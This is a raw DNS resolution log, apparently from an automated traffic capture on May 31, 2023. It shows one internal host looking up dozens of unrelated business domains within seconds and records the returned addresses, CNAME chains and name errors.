                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.504374981 CEST8.8.8.8192.168.2.30xe456No error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.504374981 CEST8.8.8.8192.168.2.30xe456No error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.504642963 CEST8.8.8.8192.168.2.30xf886No error (0)www.snugpak.com172.67.165.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.504642963 CEST8.8.8.8192.168.2.30xf886No error (0)www.snugpak.com104.21.73.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.505810976 CEST8.8.8.8192.168.2.30x6323Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.506479025 CEST8.8.8.8192.168.2.30xe41cNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.583201885 CEST8.8.8.8192.168.2.30xf62fNo error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.619075060 CEST8.8.8.8192.168.2.30x3206No error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.619075060 CEST8.8.8.8192.168.2.30x3206No error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.728780031 CEST8.8.8.8192.168.2.30x68bcNo error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.777509928 CEST8.8.8.8192.168.2.30x52eName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.860430956 CEST8.8.8.8192.168.2.30x64edNo error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.860430956 CEST8.8.8.8192.168.2.30x64edNo error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.924487114 CEST8.8.8.8192.168.2.30xb91eNo error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.924535990 CEST8.8.8.8192.168.2.30xbd81No error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.944350958 CEST8.8.8.8192.168.2.30xc385No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.964977026 CEST8.8.8.8192.168.2.30x14fdNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.022538900 CEST8.8.8.8192.168.2.30xbea5No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.022538900 CEST8.8.8.8192.168.2.30xbea5No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.037345886 CEST8.8.8.8192.168.2.30x158aNo error (0)www.netcr.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.037345886 CEST8.8.8.8192.168.2.30x158aNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.037345886 CEST8.8.8.8192.168.2.30x158aNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.037345886 CEST8.8.8.8192.168.2.30x158aNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.291528940 CEST8.8.8.8192.168.2.30xaeb7No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.291528940 CEST8.8.8.8192.168.2.30xaeb7No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.291528940 CEST8.8.8.8192.168.2.30xaeb7No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.659956932 CEST8.8.8.8192.168.2.30x693aNo error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.677777052 CEST8.8.8.8192.168.2.30x23ceNo error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.677777052 CEST8.8.8.8192.168.2.30x23ceNo error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.752424955 CEST8.8.8.8192.168.2.30xb82fNo error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.752424955 CEST8.8.8.8192.168.2.30xb82fNo error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.752424955 CEST8.8.8.8192.168.2.30xb82fNo error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.986633062 CEST8.8.8.8192.168.2.30x9248No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:20.705137968 CEST8.8.8.8192.168.2.30x51cbNo error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:20.705137968 CEST8.8.8.8192.168.2.30x51cbNo error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:21.743176937 CEST8.8.8.8192.168.2.30xed0aNo error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:21.743176937 CEST8.8.8.8192.168.2.30xed0aNo error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.022105932 CEST8.8.8.8192.168.2.30xf9b9No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.048383951 CEST8.8.8.8192.168.2.30x7accNo error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.057909012 CEST8.8.8.8192.168.2.30x2a6cNo error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.057909012 CEST8.8.8.8192.168.2.30x2a6cNo error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.057909012 CEST8.8.8.8192.168.2.30x2a6cNo error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.057909012 CEST8.8.8.8192.168.2.30x2a6cNo error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.057909012 CEST8.8.8.8192.168.2.30x2a6cNo error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.057909012 CEST8.8.8.8192.168.2.30x2a6cNo error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.205136061 CEST8.8.8.8192.168.2.30x9e2eNo error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.205136061 CEST8.8.8.8192.168.2.30x9e2eNo error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.205136061 CEST8.8.8.8192.168.2.30x9e2eNo error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.205136061 CEST8.8.8.8192.168.2.30x9e2eNo error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.205136061 CEST8.8.8.8192.168.2.30x9e2eNo error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.0.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.824901104 CEST8.8.8.8192.168.2.30x1599No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.068614960 CEST8.8.8.8192.168.2.30x368dNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.068614960 CEST8.8.8.8192.168.2.30x368dNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.071105003 CEST8.8.8.8192.168.2.30x37b0No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.071105003 CEST8.8.8.8192.168.2.30x37b0No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.071105003 CEST8.8.8.8192.168.2.30x37b0No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.126564980 CEST8.8.8.8192.168.2.30x47faNo error (0)www.dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.126564980 CEST8.8.8.8192.168.2.30x47faNo error (0)www.dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.367641926 CEST8.8.8.8192.168.2.30x834eNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.507720947 CEST8.8.8.8192.168.2.30xb2bfNo error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.561264038 CEST8.8.8.8192.168.2.30x1979Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.652358055 CEST8.8.8.8192.168.2.30x124No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.684063911 CEST8.8.8.8192.168.2.30x6acNo error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.792495966 CEST8.8.8.8192.168.2.30x3144No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:24.100970984 CEST8.8.8.8192.168.2.30xd2cNo error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:24.102216959 CEST8.8.8.8192.168.2.30x76d9Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:24.940023899 CEST8.8.8.8192.168.2.30xc9caNo error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:25.236860037 CEST8.8.8.8192.168.2.30x5ddNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:25.253985882 CEST8.8.8.8192.168.2.30x7c08No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:26.483630896 CEST8.8.8.8192.168.2.30x1875No error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.036911011 CEST8.8.8.8192.168.2.30x4101No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.036911011 CEST8.8.8.8192.168.2.30x4101No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.043330908 CEST8.8.8.8192.168.2.30x9c56No error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.046996117 CEST8.8.8.8192.168.2.30xa4c4No error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.046996117 CEST8.8.8.8192.168.2.30xa4c4No error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.047329903 CEST8.8.8.8192.168.2.30x6d59No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.047329903 CEST8.8.8.8192.168.2.30x6d59No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.049025059 CEST8.8.8.8192.168.2.30x5792No error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.049025059 CEST8.8.8.8192.168.2.30x5792No error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.049169064 CEST8.8.8.8192.168.2.30x9c0Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.051672935 CEST8.8.8.8192.168.2.30xd921No error (0)www.pdqhomes.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.051672935 CEST8.8.8.8192.168.2.30xd921No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.051672935 CEST8.8.8.8192.168.2.30xd921No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.051672935 CEST8.8.8.8192.168.2.30xd921No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.053257942 CEST8.8.8.8192.168.2.30xc9e3No error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.103087902 CEST8.8.8.8192.168.2.30x95aServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.276002884 CEST8.8.8.8192.168.2.30x2f62No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.276002884 CEST8.8.8.8192.168.2.30x2f62No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.350581884 CEST8.8.8.8192.168.2.30xc315No error (0)www.alteor.clgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.350581884 CEST8.8.8.8192.168.2.30xc315No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.350581884 CEST8.8.8.8192.168.2.30xc315No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.354688883 CEST8.8.8.8192.168.2.30x9d2No error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.354688883 CEST8.8.8.8192.168.2.30x9d2No error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.354688883 CEST8.8.8.8192.168.2.30x9d2No error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.355073929 CEST8.8.8.8192.168.2.30x4b81No error (0)www.rs-ag.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.355073929 CEST8.8.8.8192.168.2.30x4b81No error (0)www.rs-ag.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.396816969 CEST8.8.8.8192.168.2.30xa8f6No error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.396816969 CEST8.8.8.8192.168.2.30xa8f6No error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.396816969 CEST8.8.8.8192.168.2.30xa8f6No error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.651932955 CEST8.8.8.8192.168.2.30xd0b0No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.651932955 CEST8.8.8.8192.168.2.30xd0b0No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.651932955 CEST8.8.8.8192.168.2.30xd0b0No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.687628031 CEST8.8.8.8192.168.2.30x4b0cNo error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.691669941 CEST8.8.8.8192.168.2.30x10baNo error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.691669941 CEST8.8.8.8192.168.2.30x10baNo error (0)ghs.googlehosted.com216.58.215.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.744810104 CEST8.8.8.8192.168.2.30x6c8bNo error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.894578934 CEST8.8.8.8192.168.2.30x56c7No error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.894578934 CEST8.8.8.8192.168.2.30x56c7No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.894578934 CEST8.8.8.8192.168.2.30x56c7No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.955099106 CEST8.8.8.8192.168.2.30x8636No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.955099106 CEST8.8.8.8192.168.2.30x8636No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.955099106 CEST8.8.8.8192.168.2.30x8636No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.979413986 CEST8.8.8.8192.168.2.30x2fc9No error (0)www.petsfan.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.979413986 CEST8.8.8.8192.168.2.30x2fc9No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.979413986 CEST8.8.8.8192.168.2.30x2fc9No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.979413986 CEST8.8.8.8192.168.2.30x2fc9No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.178040981 CEST8.8.8.8192.168.2.30x9c8dNo error (0)www.railbook.net103.224.212.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.263012886 CEST8.8.8.8192.168.2.30x836bNo error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.269774914 CEST8.8.8.8192.168.2.30x442dNo error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.269774914 CEST8.8.8.8192.168.2.30x442dNo error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.269774914 CEST8.8.8.8192.168.2.30x442dNo error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.270473957 CEST8.8.8.8192.168.2.30xd7aaNo error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.270473957 CEST8.8.8.8192.168.2.30xd7aaNo error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.286861897 CEST8.8.8.8192.168.2.30x15fbNo error (0)www.wifi4all.nl188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.286861897 CEST8.8.8.8192.168.2.30x15fbNo error (0)www.wifi4all.nl188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.300519943 CEST8.8.8.8192.168.2.30x1ea7Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.957921028 CEST8.8.8.8192.168.2.30xdeadNo error (0)www.fcwcvt.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.957921028 CEST8.8.8.8192.168.2.30xdeadNo error (0)www.fcwcvt.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.960000038 CEST8.8.8.8192.168.2.30xedeNo error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.961494923 CEST8.8.8.8192.168.2.30x551bNo error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.965622902 CEST8.8.8.8192.168.2.30xd9e6No error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.965622902 CEST8.8.8.8192.168.2.30xd9e6No error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.966422081 CEST8.8.8.8192.168.2.30x5871No error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.966422081 CEST8.8.8.8192.168.2.30x5871No error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.998758078 CEST8.8.8.8192.168.2.30x11f9No error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.568417072 CEST8.8.8.8192.168.2.30x2a7dNo error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.568444967 CEST8.8.8.8192.168.2.30xc598No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.568444967 CEST8.8.8.8192.168.2.30xc598No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.578504086 CEST8.8.8.8192.168.2.30x89fcNo error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.578504086 CEST8.8.8.8192.168.2.30x89fcNo error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.593394041 CEST8.8.8.8192.168.2.30x3d7dNo error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.593394041 CEST8.8.8.8192.168.2.30x3d7dNo error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.691967010 CEST8.8.8.8192.168.2.30x251No error (0)www.cokocoko.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.691967010 CEST8.8.8.8192.168.2.30x251No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.691967010 CEST8.8.8.8192.168.2.30x251No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.691967010 CEST8.8.8.8192.168.2.30x251No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.692594051 CEST8.8.8.8192.168.2.30x4fbbNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.692594051 CEST8.8.8.8192.168.2.30x4fbbNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.693996906 CEST8.8.8.8192.168.2.30x4c94No error (0)www.snugpak.com172.67.165.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.693996906 CEST8.8.8.8192.168.2.30x4c94No error (0)www.snugpak.com104.21.73.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.985950947 CEST8.8.8.8192.168.2.30x9792No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
